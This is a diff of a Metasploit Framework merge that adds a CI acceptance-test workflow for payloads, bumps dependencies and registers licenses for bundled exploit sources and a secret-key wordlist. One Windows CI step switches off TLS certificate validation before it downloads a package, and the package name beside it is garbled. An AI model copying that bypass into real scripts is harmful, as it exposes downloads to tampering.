Land #18383 , improves enum_computers module

This PR adds a variety of improvements to the enum_computers module including shell and powershell support as well as improvements to run on non-english systems.
automatic module_metadata_base.json update
2023-10-12 13:01:54 -04:00 · 2023-10-12 11:42:37 -05:00 · 2023-10-12 17:19:02 +01:00 · 2023-10-12 11:04:40 -05:00 · 2023-10-12 11:29:20 -04:00 · 2023-10-12 09:50:19 -04:00
737 changed files with 77874 additions and 2976 deletions
@@ -0,0 +1,223 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'tools/dev/**'
+      - 'spec/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-11
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - 3.0.2
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          - { name: java, runtime_version: 8 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.2 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 25
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      METERPRETER: ${{ matrix.meterpreter.name }}
+      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v4
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v3
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: test
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0.2
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v3
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -90,7 +90,7 @@ jobs:
    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
        uses: actions/checkout@v3
@@ -22,6 +22,7 @@ require:
  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
+  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb

 Layout/SpaceBeforeBrackets:
  Description: >-
@@ -166,6 +167,9 @@ Layout/ModuleHashValuesOnSameLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/DetectInvalidPackDirectives:
+  Enabled: true
+
 Lint/ModuleDisclosureDateFormat:
  Enabled: true

@@ -43,9 +43,9 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
-    tar -zxf go1.19.3.src.tar.gz && \
-    rm go1.19.3.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
+    tar -zxf go1.21.1.src.tar.gz && \
+    rm go1.21.1.src.tar.gz && \
    cd go/src && \
    ./make.bash

@@ -61,8 +61,8 @@ ENV METASPLOIT_GROUP=metasploit
 RUN addgroup -S $METASPLOIT_GROUP

 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
-    python2-dev openssl-dev nasm mingw-w64-gcc
+    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -75,7 +75,7 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
+RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
 RUN pip install impacket
 RUN pip install requests

@@ -31,20 +31,24 @@ group :development do
 end

 group :development, :test do
-  # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
-  # Make rspec output shorter and more useful
-  gem 'fivemat'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  # Required during CI as well local development
  gem 'rubocop'
 end

 group :test do
+  # automatically include factories from spec/factories
+  gem 'test-prof'
+  gem 'factory_bot_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat'
+  # rspec formatter for acceptance tests
+  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -1,11 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.24)
-      actionpack (~> 7.0)
-      activerecord (~> 7.0)
-      activesupport (~> 7.0)
+    metasploit-framework (6.3.38)
+      actionpack (~> 7.0.0)
+      activerecord (~> 7.0.0)
+      activesupport (~> 7.0.0)
      aws-sdk-ec2
+      aws-sdk-ec2instanceconnect
      aws-sdk-iam
      aws-sdk-s3
      aws-sdk-ssm
@@ -25,19 +26,20 @@ PATH
      filesize
      hrr_rb_ssh-ed25519
      http-cookie
-      irb
+      irb (~> 1.7.4)
      jsobfu
      json
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.148)
+      metasploit-payloads (= 2.0.156)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.20)
+      metasploit_payloads-mettle (= 1.0.26)
      mqtt
      msgpack (~> 1.6.0)
      nessus_rest
+      net-imap
      net-ldap
      net-smtp
      net-ssh
@@ -77,6 +79,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
+      ruby-mysql
      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
@@ -100,61 +103,73 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (7.0.5)
-      actionview (= 7.0.5)
-      activesupport (= 7.0.5)
+    actionpack (7.0.8)
+      actionview (= 7.0.8)
+      activesupport (= 7.0.8)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.5)
-      activesupport (= 7.0.5)
+    actionview (7.0.8)
+      activesupport (= 7.0.8)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.5)
-      activesupport (= 7.0.5)
-    activerecord (7.0.5)
-      activemodel (= 7.0.5)
-      activesupport (= 7.0.5)
-    activesupport (7.0.5)
+    activemodel (7.0.8)
+      activesupport (= 7.0.8)
+    activerecord (7.0.8)
+      activemodel (= 7.0.8)
+      activesupport (= 7.0.8)
+    activesupport (7.0.8)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.4)
+    addressable (2.8.5)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
+    allure-rspec (2.23.0)
+      allure-ruby-commons (= 2.23.0)
+      rspec-core (>= 3.8, < 4)
+    allure-ruby-commons (2.23.0)
+      mime-types (>= 3.3, < 4)
+      require_all (>= 2, < 4)
+      rspec-expectations (~> 3.12)
+      uuid (>= 2.3, < 3)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.776.0)
-    aws-sdk-core (3.174.0)
+    aws-partitions (1.834.0)
+    aws-sdk-core (3.185.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.382.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-ec2 (1.411.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.79.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-ec2instanceconnect (1.34.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.66.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-iam (1.87.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.123.1)
-      aws-sdk-core (~> 3, >= 3.174.0)
+    aws-sdk-kms (1.72.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-s3 (1.136.0)
+      aws-sdk-core (~> 3, >= 3.181.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.4)
-    aws-sdk-ssm (1.151.0)
-      aws-sdk-core (~> 3, >= 3.174.0)
+      aws-sigv4 (~> 1.6)
+    aws-sdk-ssm (1.158.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.5.2)
+    aws-sigv4 (1.6.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.18)
+    base64 (0.1.1)
+    bcrypt (3.1.19)
    bcrypt_pbkdf (1.1.0)
    bindata (2.4.15)
    bootsnap (1.16.0)
@@ -168,6 +183,7 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    date (3.3.3)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
@@ -193,18 +209,19 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.2.0)
+    faker (3.2.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.6)
+    faraday (2.7.11)
+      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
    faraday-retry (2.2.0)
      faraday (~> 2.0)
-    faye-websocket (0.11.2)
+    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
-    ffi (1.15.5)
+    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
    gssapi (1.3.1)
@@ -224,12 +241,13 @@ GEM
    i18n (1.14.1)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.7.0)
-      reline (>= 0.3.0)
+    irb (1.7.4)
+      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.6.3)
+    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
@@ -237,14 +255,16 @@ GEM
    loofah (2.21.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
+    macaddr (1.7.2)
+      systemu (~> 2.6.5)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (5.0.1)
+    metasploit-concern (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.5)
+    metasploit-credential (6.0.6)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -254,12 +274,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.1)
+    metasploit-model (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.148)
-    metasploit_data_models (6.0.2)
+    metasploit-payloads (2.0.156)
+    metasploit_data_models (6.0.3)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -269,23 +289,29 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.20)
+    metasploit_payloads-mettle (1.0.26)
    method_source (1.0.0)
-    mini_portile2 (2.8.2)
-    minitest (5.18.0)
+    mime-types (3.5.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2023.1003)
+    mini_portile2 (2.8.4)
+    minitest (5.20.0)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
+    net-imap (0.4.0)
+      date
+      net-protocol
    net-ldap (0.18.0)
    net-protocol (0.2.1)
      timeout
-    net-smtp (0.3.3)
+    net-smtp (0.4.0)
      net-protocol
-    net-ssh (7.1.0)
-    network_interface (0.0.2)
+    net-ssh (7.2.0)
+    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.5.9)
    nokogiri (1.14.5)
@@ -301,7 +327,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.23.0)
-    parser (3.2.2.3)
+    parser (3.2.2.4)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
@@ -312,31 +338,32 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.3)
+    pg (1.5.4)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    puma (6.3.0)
+    public_suffix (5.0.3)
+    puma (6.4.0)
      nio4r (~> 2.0)
-    racc (1.7.0)
-    rack (2.2.7)
-    rack-protection (3.0.6)
-      rack
+    racc (1.7.1)
+    rack (2.2.8)
+    rack-protection (3.1.0)
+      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
-    rails-dom-testing (2.0.3)
-      activesupport (>= 4.2.0)
+    rails-dom-testing (2.2.0)
+      activesupport (>= 5.0.0)
+      minitest
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.5)
-      actionpack (= 7.0.5)
-      activesupport (= 7.0.5)
+    railties (7.0.8)
+      actionpack (= 7.0.8)
+      activesupport (= 7.0.8)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -346,61 +373,62 @@ GEM
    rasn1 (0.12.1)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.1)
+    recog (3.1.2)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.0)
-    reline (0.3.5)
+    regexp_parser (2.8.1)
+    reline (0.3.8)
      io-console (~> 0.5)
-    rex-arch (0.1.14)
+    require_all (3.0.0)
+    rex-arch (0.1.15)
      rex-text
-    rex-bin_tools (0.1.8)
+    rex-bin_tools (0.1.9)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
    rex-core (0.1.31)
-    rex-encoder (0.1.6)
+    rex-encoder (0.1.7)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.38)
+    rex-exploitation (0.1.39)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.6)
-    rex-mime (0.1.7)
+    rex-java (0.1.7)
+    rex-mime (0.1.8)
      rex-text
-    rex-nop (0.1.2)
+    rex-nop (0.1.3)
      rex-arch
-    rex-ole (0.1.7)
+    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.97)
+    rex-powershell (0.1.99)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.10)
+    rex-random_identifier (0.1.11)
      rex-text
-    rex-registry (0.1.4)
-    rex-rop_builder (0.1.4)
+    rex-registry (0.1.5)
+    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.52)
+    rex-socket (0.1.54)
      rex-core
-    rex-sslscan (0.1.9)
+    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.3)
-    rex-text (0.2.52)
-    rex-zip (0.1.4)
+    rex-struct2 (0.1.4)
+    rex-text (0.2.53)
+    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.5)
+    rexml (3.2.6)
    rkelly-remix (0.0.7)
    rspec (3.12.0)
      rspec-core (~> 3.12.0)
@@ -411,7 +439,7 @@ GEM
    rspec-expectations (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.5)
+    rspec-mocks (3.12.6)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.3)
@@ -424,20 +452,23 @@ GEM
      rspec-support (~> 3.12)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.0)
-    rubocop (1.52.0)
+    rspec-support (3.12.1)
+    rubocop (1.56.4)
+      base64 (~> 0.1.1)
      json (~> 2.3)
+      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.0.0)
+      parser (>= 3.2.2.3)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.0, < 2.0)
+      rubocop-ast (>= 1.28.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
    rubocop-ast (1.29.0)
      parser (>= 3.2.1.0)
-    ruby-macho (3.0.0)
+    ruby-macho (4.0.0)
+    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
@@ -459,24 +490,26 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.6)
+    sinatra (3.1.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.6)
+      rack-protection (= 3.1.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.3)
+    sqlite3 (1.6.6)
      mini_portile2 (~> 2.8.0)
-    sshkey (2.0.0)
+    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
+    systemu (2.6.5)
+    test-prof (1.2.3)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.2)
-    tilt (2.2.0)
-    timecop (0.9.6)
-    timeout (0.3.2)
+    tilt (2.3.0)
+    timecop (0.9.8)
+    timeout (0.4.0)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
@@ -485,12 +518,14 @@ GEM
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.4.2)
+    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
+    uuid (2.3.9)
+      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.8.1)
-    websocket-driver (0.7.5)
+    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
@@ -507,15 +542,16 @@ GEM
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
      webrick
    yard (0.9.34)
-    zeitwerk (2.6.8)
+    zeitwerk (2.6.12)

 PLATFORMS
  ruby

 DEPENDENCIES
+  allure-rspec
  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
@@ -530,6 +566,7 @@ DEPENDENCIES
  rubocop
  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
+  test-prof
  timecop
  yard

@@ -21,6 +21,11 @@ Copyright: 2007  Roland Bouman
 License: LGPL-2.1
 Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb

+Files: data/exploits/cve-2023-34634/test.png
+Copyright: 2023 Brendan Watters
+License: MIT
+Purpose: These image is used as the default file to embed the exploit command.
+
 Files: data/headers/windows/c_payload_util/beacon.h
 Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
 License: Apache 2.0
@@ -44,6 +49,11 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

+Files: data/wordlists/flask_secret_keys.txt
+Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
+Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
+License: MIT
+
 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause
@@ -75,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT

+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+         function calls to implement the exploit.  The heavily modified C main is necessary
+         to create and trigger the exploit.
+
 Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
 Copyright: 2011 Jon Bringhurst
 License: GNU GPL 2.0
@@ -7,12 +7,15 @@ activerecord, 7.0.5, MIT
 activesupport, 7.0.5, MIT
 addressable, 2.8.4, "Apache 2.0"
 afm, 0.2.2, MIT
+allure-rspec, 2.22.0, "Apache 2.0"
+allure-ruby-commons, 2.22.0, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
 aws-partitions, 1.776.0, "Apache 2.0"
 aws-sdk-core, 3.174.0, "Apache 2.0"
 aws-sdk-ec2, 1.382.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.27.0, "Apache 2.0"
 aws-sdk-iam, 1.79.0, "Apache 2.0"
 aws-sdk-kms, 1.66.0, "Apache 2.0"
 aws-sdk-s3, 1.123.1, "Apache 2.0"
@@ -32,6 +35,7 @@ concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+date, 3.3.3, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.70.0, "Apache 2.0"
@@ -69,16 +73,19 @@ json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
 loofah, 2.21.3, MIT
+macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
 metasploit-credential, 6.0.5, "New BSD"
-metasploit-framework, 6.3.24, "New BSD"
+metasploit-framework, 6.3.38, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.147, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
-metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
+mime-types, 3.4.1, MIT
+mime-types-data, 3.2023.0218.1, MIT
 mini_portile2, 2.8.2, MIT
 minitest, 5.18.0, MIT
 mqtt, 0.6.0, MIT
@@ -86,11 +93,12 @@ msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
+net-imap, 0.3.7, "ruby, Simplified BSD"
 net-ldap, 0.18.0, MIT
